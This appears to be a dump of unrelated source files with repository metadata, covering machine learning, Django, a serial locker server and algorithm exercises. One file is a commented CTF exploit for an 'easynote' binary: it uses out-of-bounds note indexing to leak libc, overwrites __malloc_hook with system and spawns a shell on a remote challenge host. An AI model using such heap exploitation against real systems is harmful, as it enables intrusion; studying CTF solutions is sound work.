import torch.nn as nn
import torchvision.transforms as transforms
import torchvision.datasets as dsets
def prepare_mnist_data(batch_size):
    """Return (train, val, test) MNIST DataLoaders with a 50k/10k train/val split."""
    to_tensor = transforms.ToTensor()
    full_train = dsets.MNIST(root='./data', train=True, transform=to_tensor, download=True)
    train_set, val_set = torch.utils.data.random_split(full_train, [50000, 10000])
    test_set = dsets.MNIST(root='./data', train=False, transform=to_tensor)
    make_loader = torch.utils.data.DataLoader
    train_loader = make_loader(dataset=train_set, batch_size=batch_size, shuffle=True)
    val_loader = make_loader(dataset=val_set, batch_size=batch_size, shuffle=True)
    test_loader = make_loader(dataset=test_set, batch_size=batch_size, shuffle=False)
    return train_loader, val_loader, test_loader
class LogisticRegressionModel(nn.Module):
    """Multinomial logistic regression with manual L1/L2 (elastic-net style) penalty.

    The penalty is added to the cross-entropy loss in one_step() rather than
    through the optimizer's weight_decay.
    """
    def __init__(self, input_dim, output_dim, alpha_l1, alpha_l2, learning_rate):
        super(LogisticRegressionModel, self).__init__()
        self.input_dim = input_dim        # flattened feature count (e.g. 28*28)
        self.output_dim = output_dim      # number of classes
        self.learning_rate = learning_rate
        self.linear = nn.Linear(self.input_dim, self.output_dim)
        self.alpha_l1 = alpha_l1          # L1 penalty coefficient
        self.alpha_l2 = alpha_l2          # L2 penalty coefficient
        self.optimizer = torch.optim.SGD(self.parameters(), lr=self.learning_rate)
        self.criterion = nn.CrossEntropyLoss()
    def forward(self, x):
        """Return raw class logits for a (batch, input_dim) tensor."""
        return self.linear(x)
    def one_step(self, images, labels):
        """Run one SGD step on a single mini-batch (images flattened to input_dim)."""
        images = images.view(-1, self.input_dim).requires_grad_()
        self.optimizer.zero_grad()
        outputs = self.forward(images)
        loss = (self.criterion(outputs, labels)
                + self.alpha_l1 * torch.sum(torch.abs(self.linear.weight))
                + self.alpha_l2 * torch.norm(self.linear.weight) ** 2)
        loss.backward()
        self.optimizer.step()
    def calc_accuracy(self, dataloader):
        """Return classification accuracy (0-100) over a DataLoader.

        Fix: evaluation no longer tracks gradients — the original called
        requires_grad_() on the inputs and built an autograd graph for every
        batch during a pure inference pass, wasting memory for no benefit.
        """
        correct = 0
        total = 0
        with torch.no_grad():
            for images, labels in dataloader:
                images = images.view(-1, self.input_dim)
                outputs = self.forward(images)
                _, predicted = torch.max(outputs.data, 1)
                total += labels.size(0)
                correct += (predicted == labels).sum()
        accuracy = 100. * correct.item() / total
        return accuracy
def logistic_regression_training(parameters, time_limit=10, check_per_iterations=50):
    """Train MNIST logistic regression for up to *time_limit* seconds.

    parameters: four log-space hyper-parameters
        [log_alpha_l1, log_alpha_l2, log_batch_size, log_learning_rate]
    Returns (-train_acc, -val_acc, -test_acc), negated so a hyper-parameter
    optimiser can minimise them.

    Fix: `parameters` is coerced with np.asarray(...).flatten(), so plain
    Python lists work too — the original called .flatten() directly, which
    raised AttributeError for the list literal used in the __main__ demo.
    A zero batch size (from a very small log value) is also guarded now.
    """
    params = np.asarray(parameters, dtype=float).flatten()
    log_alpha_l1, log_alpha_l2, log_batch_size, log_learning_rate = params
    alpha_l1, alpha_l2 = np.exp(log_alpha_l1), np.exp(log_alpha_l2)
    batch_size = max(1, int(np.exp(log_batch_size)))
    learning_rate = np.exp(log_learning_rate)
    train_loader, val_loader, test_loader = prepare_mnist_data(batch_size=batch_size)
    model = LogisticRegressionModel(input_dim=28*28, output_dim=10, alpha_l1=alpha_l1,
                                    alpha_l2=alpha_l2, learning_rate=learning_rate)
    starting_time = time.time()
    cnt = 0
    while True:
        for images, labels in train_loader:
            model.one_step(images, labels)
            cnt += 1
            # Poll the wall clock only every check_per_iterations steps.
            if cnt % check_per_iterations == 0:
                if time.time() - starting_time > time_limit:
                    break
        if time.time() - starting_time > time_limit:
            break
    training_accuracy = model.calc_accuracy(train_loader)
    val_accuracy = model.calc_accuracy(val_loader)
    test_accuracy = model.calc_accuracy(test_loader)
    return -training_accuracy, -val_accuracy, -test_accuracy
# Quick demo: train briefly with fixed log-space hyper-parameters and print the
# three negated accuracies (train, validation, test).
if __name__ == '__main__':
    training_accuracy, val_accuracy, test_accuracy = logistic_regression_training([-8., -8., 3., -2.])
    print(training_accuracy, val_accuracy, test_accuracy)
| [
"liusulin92@gmail.com"
] | liusulin92@gmail.com |
afb361b22b4a2c9a14030264ca29d44363e14ebc | 25b19cd0c0211de51fd307cdd43e19f9ffa924f5 | /venv/Scripts/pip3.7-script.py | 806411e5f41efd35c98f182d02a92539d5d764c9 | [] | no_license | izazm8/TravelPlanner | 2237fd556c9f57109b351072ae8c79f0ad7b9f51 | 52d212da7bac21a30589c3ea83be56325173b1b4 | refs/heads/master | 2020-04-19T09:15:19.425587 | 2018-12-30T22:26:36 | 2018-12-30T22:26:36 | 168,104,420 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | #!C:\Users\Mustaghees\PycharmProjects\TravelPlanner\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.7'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
# Auto-generated setuptools console-script shim: normalise argv[0] (strip the
# "-script.py"/".exe" wrapper suffix) and hand control to pip's entry point.
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.7')()
    )
| [
"renaldpirate@gmail.com"
] | renaldpirate@gmail.com |
64dd9b08095b15380f853a6fdd8e0a8ed26d1465 | c3329e4c6fa308f9a41fa18af36445f32b875f4a | /setup.py | 6475648b60bfe85fa434f5922a94355862b4b9b1 | [
"MIT"
] | permissive | rritoch/pandas_zmq | 6ac0379b150eac95ffd6188c3cf8faf786536846 | d428fb049a52a2dc7e850156bfa2a0d16831177b | refs/heads/master | 2022-11-25T01:10:49.850963 | 2020-07-28T08:33:00 | 2020-07-28T08:33:00 | 279,081,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 700 | py | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="pandas-zmq",
version="0.0.3",
author="Ralph Ritoch",
author_email="rritoch@gmail.com",
description="Communicate Pandas DataFrame over ZeroMQ connection",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/rritoch/pandas_zmq",
packages=['pandas_zmq'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
'pyzmq',
],
python_requires='>=3.3',
)
| [
"rritoch@gmail.com"
] | rritoch@gmail.com |
9ae24247dda00fad800f80dd2c1f56c3c26b82c1 | 29a5b663a88c5763d6176a0408b51f2d9f46adbf | /python/lecture3/tasks/views.py | a2049bedf1bdb2e66397500a0ef794ac1ae3771f | [] | no_license | chanakaudaya/cs50-source-code | f8c6de41c34ca5ad4dea7aecf62ed220cbdb1af6 | 975b46ded13f656e18dcc8bba8266c8947576958 | refs/heads/main | 2023-06-18T02:21:25.959233 | 2021-07-18T06:43:23 | 2021-07-18T06:49:30 | 387,109,051 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | from django.shortcuts import render
# Module-level, in-memory task store: shared by all requests, reset on restart.
tasks = ["foo", "bar", "baz"]
# Create your views here.
def index(request):
    """Render the task-list page."""
    context = {"tasks": tasks}
    return render(request, "tasks/index.html", context)
def add(request):
    """Render the add-task form page."""
    return render(request, "tasks/add.html")
"chanaka.leadership@gmail.com"
] | chanaka.leadership@gmail.com |
f46477242fa911d6e3c8332e24eb1cc7e38b0750 | 99d436394e47571160340c95d527ecadaae83541 | /algorithms_questions/ch14_sorting/q26_2.py | 1d3dbab643ddebf9f47062db3e7538e2d0eb1102 | [] | no_license | LeeSeok-Jun/Algorithms | b47ba4de5580302e9e2399bcf85d245ebeb1b93d | 0e8573bd03c50df3f89dd0ee9eed9cf8716ef8d8 | refs/heads/main | 2023-03-02T06:47:20.939235 | 2021-02-08T05:18:24 | 2021-02-08T05:18:24 | 299,840,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | """
카드 정렬하기 - 3회차
"""
# 풀이 제한 시간 : 30분
# 2021/01/21 14:57 ~ 15:15
# 실패 - 틀린 부분 주석 처리
import heapq
n = int(input())
data = []
for _ in range(n):
heapq.heappush(data, int(input()))
"""
sum_value = heapq.heappop(data)
while data:
now = heapq.heappop(data)
sum_value += now
heapq.heappush(data, sum_value)
print(sum_value)
"""
result = 0
while len(data) != 1:
one = heapq.heappop(data)
two = heapq.heappop(data)
sum_value = one + two
result += sum_value
heapq.heappush(data, result)
print(result)
| [
"seok9376@gmail.com"
] | seok9376@gmail.com |
e6f0722f81bf18061e524fef27387e979ffb987b | 66fad69779c0cb4cc2caa72686fe41db0f63ff80 | /docs/doxygen/doxyxml/text.py | 96a38c45def36eb824183bdeecd3321ffa21c6d5 | [] | no_license | xiaogaogaoxiao/gr-AnyScatter | c9e4d56febf34673cb205f149ce263df62d0a7ca | c9e71a4efd12a19b0492788593ac5bd7055625cb | refs/heads/master | 2022-04-16T18:01:15.660178 | 2020-04-06T13:45:32 | 2020-04-06T13:45:32 | 275,690,629 | 1 | 1 | null | 2020-06-29T00:08:23 | 2020-06-29T00:08:22 | null | UTF-8 | Python | false | false | 1,947 | py | #
# Copyright 2010 Free Software Foundation, Inc.
#
# This file was generated by gr_modtool, a tool from the GNU Radio framework
# This file is a part of gr-AnyScatter
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
"""
Utilities for extracting text from generated classes.
"""
from __future__ import unicode_literals
def is_string(txt):
    """Return True when *txt* is a text string.

    The original carried a Python 2 compatibility shim that probed for the
    ``unicode`` builtin via ``NameError``; under Python 3 both probes tested
    ``str`` twice, so a single isinstance check is equivalent.
    """
    return isinstance(txt, str)
def description(obj):
    """Return the stripped description text of *obj*, or None for no node."""
    return None if obj is None else description_bit(obj).strip()
def description_bit(obj):
    """Recursively collect the text held by one generated-class node.

    Nodes may expose their children through ``content``, ``content_`` or a
    single ``value`` attribute; leaves are plain strings.
    """
    if hasattr(obj, 'content'):
        text = ''.join(description_bit(child) for child in obj.content)
    elif hasattr(obj, 'content_'):
        text = ''.join(description_bit(child) for child in obj.content_)
    elif hasattr(obj, 'value'):
        text = description_bit(obj.value)
    elif is_string(obj):
        return obj
    else:
        raise Exception('Expecting a string or something with content, content_ or value attribute')
    # Paragraph nodes get a trailing blank line so paragraphs stay separated.
    if hasattr(obj, 'name') and obj.name == 'para':
        text += "\n\n"
    return text
| [
"nonzerosume@gmail.com"
] | nonzerosume@gmail.com |
c8ffef0f996508839e103bcceab71afd3dd3f5fe | db19681c5349e60fd16eafcfef220327f42f8517 | /프로젝트/countLine/arm_m3_kit_server.py | ea007e5fc3c7f0a71ab424f46207d6b903e13d68 | [] | no_license | demetoir/2016-2-microprocessor-project | 1bb19499629b243e5d508e553bcf0ba2d0f926f5 | 2098ff6a574e2c16e2a8aa17cfbc2a8fa31d36ef | refs/heads/master | 2022-04-23T23:25:43.886535 | 2020-04-27T05:26:48 | 2020-04-27T05:26:48 | 74,488,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,902 | py | false = False
true = True
import serial
import time
import sys
import traceback
import datetime
import random
from time import gmtime, strftime
rootPwd = "1234"
class arm_m3_kit_server:
    """Serial-port server that talks to an ARM Cortex-M3 locker kit.

    Implements a small line-oriented text protocol over pyserial:
    handshaking, clock synchronisation, keep-alive checks and locker
    password permission requests.  Frames end with "end\n"; because
    receiveMsg() returns the repr() of the raw bytes, the terminator
    appears on the receive side as the literal two characters backslash+n
    (written 'end\\n' in the comparisons below).

    NOTE: this block also restores the indentation that was lost in the
    stored copy of this file; the logic is otherwise preserved.
    """

    # Attribute name keeps its historical misspelling ("ENCONDDING") for
    # backward compatibility with existing callers.
    MSG_ENCONDDING_TYPE = "ascii"
    MAX_MSG_LEN = 100
    # Known protocol keywords (documentation only; not consulted by the code).
    connectionMsgList = ["end\n",
                         "send_handshake",
                         "receive_handshake",
                         "connected_confirm",
                         "send",
                         "receive",
                         "disconnect",
                         "success"]
    SLEEP_TIME = 0.1                 # seconds per polling tick (see delay())
    CHECK_CONNECTION_INTERVAL = 50   # main-loop ticks between keep-alive checks
    HAND_SHAKE_TIME_LIMIT = 20       # seconds; nominal handshake timeout budget
    lockerDB = {}                    # locker number -> {"lockerPassword": str, ...}

    def setLockerDB(self, lockerDB):
        """Install the locker database used to answer permission requests."""
        self.lockerDB = lockerDB

    def delay(self):
        """Sleep one polling tick."""
        time.sleep(self.SLEEP_TIME)

    class SerialConnectionSetting:
        """Bag of pyserial parameters (defaults: COM5 @ 115200, 8N1)."""
        port = 'COM5'
        baudrate = 115200
        parity = 'N'
        stopbits = 1
        bytesize = 8
        timeout = 0

        def __init__(self, port='COM5', baudrate=115200, parity='N',
                     stopbits=1, bytesize=8, timeout=0):
            self.port = port
            self.baudrate = baudrate
            self.parity = parity
            self.stopbits = stopbits
            self.bytesize = bytesize
            self.timeout = timeout

    serialConnectionSetting = SerialConnectionSetting()
    serialConnectionObject = None

    def connectSerial(self, setting):
        """Open the serial port described by *setting*.

        Returns True on success, False on failure (error is printed).
        """
        try:
            self.serialConnectionObject = serial.Serial(port=setting.port,
                                                        baudrate=setting.baudrate,
                                                        parity=setting.parity,
                                                        stopbits=setting.stopbits,
                                                        bytesize=setting.bytesize,
                                                        timeout=setting.timeout)
        except Exception:
            # Was a bare "except:"; narrowed so Ctrl-C is not swallowed.
            print("fail to open serial port")
            traceback.print_exc(file=sys.stdout)
            return False
        print("success to open serial port")
        print("serial object : ", self.serialConnectionObject)
        print("serial setting : ", self.serialConnectionObject.portstr)
        return True

    def receiveMsg(self):
        """Read one line; return repr(bytes) minus the b'...' wrapper.

        Escape sequences therefore stay literal: a newline arrives as the
        two characters backslash + n.
        """
        return str(self.serialConnectionObject.readline())[2:-1]

    def sendMsg(self, msg, showEcho=False):
        """Send *msg* one byte at a time, waiting for the kit's echo of each."""
        for c in msg:
            bChar = bytes(c, encoding=self.MSG_ENCONDDING_TYPE)
            self.serialConnectionObject.write(bChar)
            echoChar = ""
            while 1:
                echoChar = self.receiveMsg()
                if echoChar != '':
                    break
            if showEcho:
                print("send : %s echo : %s" % (bChar, echoChar))
        return

    def makeHandShake(self, showLog=False, timeOut=HAND_SHAKE_TIME_LIMIT):
        """Perform one handshake round-trip.

        Sends "send_handshake" and waits about one second for the kit's
        "receive_handshake" answer.  Returns True when it arrived, False
        on timeout.  *timeOut* is accepted for compatibility but the retry
        window is currently hard-coded to one second.
        """
        # Bug fix: time.clock was removed in Python 3.8.
        curtime = time.perf_counter
        startTime = curtime()
        handShakeMsg = "send_handshake end\n"
        if showLog:
            print("server send : send handshake msg")
        self.sendMsg(handShakeMsg)
        msg = ""
        while 1:
            self.delay()
            rcvMsg = self.receiveMsg()
            if curtime() - startTime > 1:
                # Window expired: queue another handshake and report failure.
                self.sendMsg(handShakeMsg)
                break
            msg += rcvMsg
            if showLog:
                print("server : receive buffer :" + msg)
            msgTokenList = msg.split()
            # Wait until a complete frame (terminated by literal "\n") is in.
            if len(msgTokenList) < 2 or msgTokenList[-1] != "end\\n":
                continue
            if msgTokenList[0] == "receive_handshake" and msgTokenList[1] == 'end\\n':
                msg = "receive_handshake end\n"
                if showLog:
                    print("server receive : <%s> " % (msg))
                return True
        return False

    def disconnectToArmKit(self, showLog=False):
        """Ask the kit to disconnect and wait for its confirmation.

        Resends the request after three seconds and whenever the receive
        buffer grows past MAX_MSG_LEN.  NOTE(review): neither the timer
        nor the buffer is reset after a resend, so a silent kit gets
        re-pinged on every polling tick once the first timeout fires —
        preserved as-is to keep the original timing behaviour.
        """
        # Bug fix: time.clock was removed in Python 3.8.
        curtime = time.perf_counter
        starttime = curtime()
        dcsMsg = "disconnect end\n"
        dcrMsg = "disconnect success end\\n"
        self.sendMsg(dcsMsg)
        if showLog:
            print("server send : ", dcsMsg)
            print("server hear : ")
        msg = ""
        while True:
            if curtime() - starttime > 3:
                if showLog:
                    print("server : disconnect time out")
                    print("server : resend disconnect msg")
                self.sendMsg(dcsMsg)
            self.delay()
            s = self.receiveMsg()
            if s == "":
                continue
            msg += s
            if showLog:
                print("buffer :", msg)
            if dcrMsg in msg:
                break
            if len(msg) > self.MAX_MSG_LEN:
                if showLog:
                    print("server : disconnection error")
                    print("server : resend disconnect msg")
                self.sendMsg(dcsMsg)
        return True

    def sendSynTimeMsg(self, showLog=False):
        """Send the current wall-clock time as "Syc_time YYYYmmddHHMMSS".

        "Syc_time" is the keyword the firmware expects — do not "fix" it.
        """
        isOk = True
        if showLog:
            print("current time : %s" % (datetime.datetime.now()))
        now = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
        msg = "Syc_time %s end\n" % (now)
        self.sendMsg(msg)
        if showLog:
            print("server send : %s" % (bytes(msg, encoding=self.MSG_ENCONDDING_TYPE)))
        return isOk

    def CheckConnection(self, showLog=False):
        """Keep-alive: send "check_connection" and wait up to 5 s for the echo."""
        self.sendMsg("check_connection end\n")
        msg = ""
        startTime = time.time()
        timeLimit = 5
        rcvmsg = "check_connection end\\n"
        while 1:
            if time.time() - startTime > timeLimit:
                if showLog:
                    print("check connection time out")
                return False
            msg += self.receiveMsg()
            if showLog:
                print(type(msg), type(rcvmsg))
                print(msg == rcvmsg)
                print("received :", msg)
                print("target :", rcvmsg)
            if rcvmsg in msg:
                return True

    def isPemissionMsg(self, msg, showLog=False):
        """True when *msg* is a "request_permission <pwd> <locker> end" frame.

        (Method name keeps its historical misspelling for compatibility.)
        """
        tokenList = msg.split()
        if len(tokenList) < 4:
            return False
        if tokenList[0] == "request_permission" and tokenList[3] == 'end\\n':
            return True
        return False

    def responsePermissionMsg(self, msg, showLog=False):
        """Validate a permission request against lockerDB and answer yes/no.

        On success the stored password is rotated to a fresh random 4-digit
        code, so each password can only be used once.
        """
        tokenList = msg.split()
        pwd = tokenList[1]
        lockerNum = tokenList[2]
        if showLog:
            # Bug fix: this line referenced the undefined name "lockNum"
            # and raised NameError whenever logging was enabled.
            print("server recieved : pwd %s , lockNum : %s" % (pwd, lockerNum))
        if lockerNum in self.lockerDB and self.lockerDB[lockerNum]["lockerPassword"] == pwd:
            self.lockerDB[lockerNum]["lockerPassword"] = "%04d" % (random.randint(0, 9999))
            result = True
        else:
            result = False
        # "reseponse_permission" is the keyword the firmware expects; keep as-is.
        if result:
            msg = "reseponse_permission %s end\n" % ("yes")
        else:
            msg = "reseponse_permission %s end\n" % ("no")
        if showLog:
            print("server send : %s" % (msg))
        self.sendMsg(msg)

    def printTimeLog(self, msg, showLog=True):
        """Print *msg* prefixed with the current timestamp."""
        if showLog:
            print("%s arm server : %s" % (str(datetime.datetime.now()), msg))

    def connectToArmKit(self, showLowg=False):
        """Full (re)connect: disconnect, handshake until success, sync clock.

        (Parameter name keeps its historical typo for compatibility; unused.)
        """
        self.disconnectToArmKit()
        self.printTimeLog("disconnection success")
        self.printTimeLog("start hand shake")
        while 1:
            if self.makeHandShake():
                break
            self.printTimeLog("retry hand shake")
        self.printTimeLog("hand shake success")
        self.sendSynTimeMsg()
        self.printTimeLog("sync Time complete")
        return

    def main(self, _lockerDB=None):
        """Run the server loop: connect, then poll for permission requests,
        issuing a keep-alive every CHECK_CONNECTION_INTERVAL ticks.
        """
        # Bug fix: the default used to be a mutable {} shared across calls.
        if _lockerDB is None:
            _lockerDB = {}
        self.setLockerDB(_lockerDB)
        self.connectSerial(self.serialConnectionSetting)
        if self.serialConnectionObject is None:
            self.printTimeLog("can not make serial connection")
            sys.exit()  # was exit(); same SystemExit without relying on site
        self.connectToArmKit()
        checkConnectionTime = self.CHECK_CONNECTION_INTERVAL
        msg = ""
        while True:
            self.delay()
            checkConnectionTime -= 1
            if checkConnectionTime <= 0:
                checkConnectionTime = self.CHECK_CONNECTION_INTERVAL
                if self.CheckConnection():
                    self.printTimeLog("check ok")
                else:
                    # Keep-alive failed: run the full reconnect sequence.
                    self.connectToArmKit()
            msg += self.receiveMsg()
            if msg != "":
                tokenList = msg.split()
                if tokenList[-1] != 'end\\n':
                    continue
                self.printTimeLog("received : %s" % (msg))
                if self.isPemissionMsg(msg):
                    self.responsePermissionMsg(msg)
                # Clear the buffer once a complete frame has been handled.
                msg = ""
                continue
        self.disconnectToArmKit()
# Entry point: run the locker-kit server with an empty locker database.
if __name__ == "__main__":
    arm_m3_kit_server().main()
| [
"wnsqlehlswk@naver.com"
] | wnsqlehlswk@naver.com |
3b3a68e496df3baa70a626c784c1ac7d960d6835 | c6f375f5d237b6472f014a2a47f032897aedc65b | /TRACKER/trackerApp/migrations/0001_initial.py | de6bdaf90a82acc575fbacf8f243b241949f1f0a | [] | no_license | gsblinkhorn/TODO-List-App | a0420b2415f72af2673e91bf13a565be2ee65866 | e6d6f86ab9e809bd3f033f52c34e448fecce91e1 | refs/heads/master | 2021-06-21T13:51:53.200826 | 2019-06-10T21:58:23 | 2019-06-10T21:58:23 | 170,768,029 | 0 | 0 | null | 2021-06-10T21:10:29 | 2019-02-14T22:40:20 | HTML | UTF-8 | Python | false | false | 609 | py | # Generated by Django 2.1.7 on 2019-02-12 22:43
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial schema migration for trackerApp (generated by Django 2.1.7).
    # Creates the "List" table: one row per TODO item.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='List',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('item', models.CharField(max_length=200)),
                ('completed', models.BooleanField(default=False)),
                # NOTE(review): DateField(default=None) without null=True means
                # every save must supply a date explicitly — confirm intended.
                ('date', models.DateField(default=None)),
            ],
        ),
    ]
| [
"gsblinkhorn@gmail.com"
] | gsblinkhorn@gmail.com |
f26f5381c735e2b392efb5377724e8ec377a6a3a | 70e7533a4342cd4eff6714693d0838d50a694ec1 | /DSA_level_up_course/Arrays_and_Vectors/mountain.py | 6d1843642ec37336625181080b08079d24c9ddc0 | [] | no_license | au1206/DS-algo_practice | 5e1673e1b1e4b282669b4ad1f3f4aaf3e27a646c | 126fcb339e54768dd162c9a3e6cc04ef7b6184ee | refs/heads/main | 2023-06-03T03:51:41.469942 | 2021-06-28T03:45:36 | 2021-06-28T03:45:36 | 351,354,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | """
Write a function that take in an array of distinct integers, and returns the length of highest mountain.
A mountain is defined as adjacent integers that are strictly increasing until they reach a peak, at which becomes
strictly decreasing. At least 3 numbers are needed to for a mountain
"""
# identify peaks - a[]
# from the peak, move backwards till they decrease, similarly for positive side
# O(2n)
def peaks(arr):
    """Find every mountain peak in *arr* and measure its mountain.

    A mountain is a strictly increasing run immediately followed by a
    strictly decreasing one (so it needs at least 3 elements).  For each
    peak the result holds a tuple

        (peak_value, left_length, right_length, total_length)

    where total_length = left_length + right_length + 1 is the length of
    the whole mountain.  Returns [] when there is no mountain.
    """
    out = []
    for i in range(1, len(arr) - 1):
        if arr[i] > arr[i - 1] and arr[i] > arr[i + 1]:
            # Found a peak: walk left while strictly increasing toward it.
            count_back = 0
            j = i
            while j >= 1 and arr[j] > arr[j - 1]:
                count_back += 1
                j -= 1
            # Walk right while strictly decreasing from the peak.
            # Bug fix: the old bound "<= len(arr)-1" read arr[k+1] one past
            # the end whenever the descent reached the last element.
            count_front = 0
            k = i
            while k < len(arr) - 1 and arr[k] > arr[k + 1]:
                count_front += 1
                k += 1
            # Bug fix: this append was commented out, so the function
            # always returned an empty list.
            out.append((arr[i], count_back, count_front,
                        count_back + count_front + 1))
    return out
if __name__ == '__main__':
    # Quick demo on a sample array containing several mountains.
    sample = [5, 6, 1, 2, 3, 4, 5, 4, 3, 2, 0, 1, 2, 3, -2, 4]
    print(peaks(sample))
| [
"akshayuppal12@gmail.com"
] | akshayuppal12@gmail.com |
849efcb9ae64e03c1b88eae58cb552402b5621b0 | 1795060a895d91b1cd882c1a847a6f88337071a2 | /writeups/crossctf-quals2018/pwn/easynote/easynote.py | 70c8de31417be0104c3f49863b424dcaa7eb40bb | [] | no_license | nushosilayer8/writeups | 08853ffc78b5823d01209db005da1207f1d0f83a | 3c664ce22ffc942ad3c4d3d818326ca1d95e2a0b | refs/heads/master | 2020-03-18T03:12:45.641423 | 2019-10-03T04:04:00 | 2019-10-03T04:04:00 | 134,228,492 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,224 | py | from pwn import *
context.log_level='debug'
# read and edit in the binary have a vulnerability:
# they can take in negative indexes
# edit also doesnt malloc() if the entry is non-null
# Thus, we can modify the contents of the note after #i
# using edit(#i, -1, 'stuff')
# and also read the contents of a note (including the address
# of the next note) using read(#i, -1)
# The structure of the note is as follows:
# +----------+----------+----------+----------+ ...
# | size | next ptr |entry_ptr0|entry_ptr1| ...
# +----------+----------+----------+----------+ ...
# Entry indexes:
# -2 -1 0 1 ...
# Target libc shipped with the challenge; preloading it locally keeps the
# hard-coded offsets below valid for both local and remote runs.
libc_path = './easynote_libc-2.26.so'
libc = ELF(libc_path)
# Run with R=1 on the command line to attack the remote service,
# otherwise spawn the local binary with the challenge libc preloaded.
if args['R']=='1':
    p = remote('ctf.pwn.sg', 1700)
else:
    p = process('./easynote', env = {'LD_PRELOAD': os.path.join(os.getcwd(), libc_path)})
def create(sz):
    """Menu option 0: allocate a new note with *sz* entries."""
    p.sendlineafter('Choice: ', '0')
    p.sendlineafter('Entries: ', ' %s' % sz)
def delete(sz):
    """Menu option 1: free the note at notebook index *sz*."""
    p.sendlineafter('Choice: ', '1')
    p.sendlineafter('Notebook index: ', ' %s' % sz)
def read(nidx, eidx):
    """Menu option 2: dump entry *eidx* of note *nidx*; returns the line.

    Negative entry indices are accepted by the binary — that out-of-bounds
    read is one of the two bugs this exploit leans on.
    """
    p.sendlineafter('Choice: ', '2')
    p.sendlineafter('Notebook index: ', ' %s' % nidx)
    p.sendlineafter('Entry index: ', ' %s' % eidx)
    return p.recvline()
def edit(nidx, eidx, content):
    """Menu option 3: write *content* into entry *eidx* of note *nidx*.

    Like read(), accepts negative indices, giving an out-of-bounds write.
    """
    p.sendlineafter('Choice: ', '3')
    p.sendlineafter('Notebook index: ', ' %s' % nidx)
    p.sendlineafter('Entry index: ', ' %s' % eidx)
    p.sendlineafter('Enter contents: ', content)
# Exploitation plan
# -----------------
# If we create a large amount of memory, malloc()
# will call mmap(), and a new region of valid memory
# will be used as an 'extra heap'.
# This region of memory is actually RIGHT before libc
# (0x422000 before libc)!
# The idea is to read where libc is, then overwrite function pointers
# such as __malloc_hook or __free_hook to system() so that malloc/free
# becomes system()

# create large amt of memory
# this actually allocates the note at the new extra heap,
# somewhere around the upper half of the new extra heap
# index #0
# NOTE(review): under Python 3 "0x210000/8" is a float, so the menu sees
# "270336.0"; the binary's number parser stops at the '.', which is why
# this still works.  Use // when porting.
create(0x210000/8)
# fill up the original heap so that the next create() will
# ask from the extra heap
# index #1
create(16800)
# at -1 of index #0 is the pointer to index #1
# so we overwrite the `size` field of index #1
# to 'a'*8, so that when we read(0, -1), we can
# read 'aaaaaaaa'+(ptr to index #2)
edit(0, -1,'a'*8)
# create index #2
create(0x210000/8)
# now leak the address of index #2
# this is the address of the start of the extra heap + 0x10
leak = u64(read(0, -1)[8:-1].ljust(8,'\x00'))
# libc sits at a constant offset (0x422000) from the extra heap
libc_base=leak-0x10+0x422000
# hardcoded offsets — valid only for easynote_libc-2.26.so
__malloc_hook = libc_base + 0x003dac10
system = libc_base + 294336
print(hex(libc_base))
# Now we set index #2's size to 'a'*8 and its 'next ptr' to __malloc_hook
edit(1, -1, 'a'*8 + p64(__malloc_hook))
# Overwrite the function pointer at __malloc_hook with system;
# from now on every malloc() call goes through system()
edit(2, -1, p64(system))
#success('PID: %s'%p.pid)
pause()
# libc_base+1720096 is the address of the "/bin/sh" string in libc.
# We are basically calling malloc("/bin/sh"),
# which calls __malloc_hook("/bin/sh", ...),
# which is actually system("/bin/sh").
# (the /8-2 undoes the "entries -> bytes" scaling plus the 2-slot header)
create((libc_base+1720096)/8-2)
p.interactive()
| [
"enigmatrix2000@gmail.com"
] | enigmatrix2000@gmail.com |
84a44293453107c4c6dd00597d3f3f1c970b6484 | de4e8e0f33dbd8bb39784907b420f05b2d62f65a | /test/test_sub_step_type.py | e57e83c7a9007b51213a5ff59a81bf9107ecdcc5 | [
"BSD-3-Clause"
] | permissive | hpcc-systems/uptrends-python | 489d7b513d1eeaf57569081363861010492a85e6 | 2e05ba851a4e65bde3c40514f499c475465bef90 | refs/heads/master | 2022-11-15T05:32:38.638456 | 2020-07-10T18:48:45 | 2020-07-10T18:48:45 | 256,216,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,093 | py | # coding: utf-8
"""
Uptrends API v4
This document describes Uptrends API version 4. This Swagger environment also lets you execute API methods directly. Please note that this is not a sandbox environment: these API methods operate directly on your actual Uptrends account. For more information, please visit https://www.uptrends.com/api. # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import uptrends
from uptrends.models.sub_step_type import SubStepType # noqa: E501
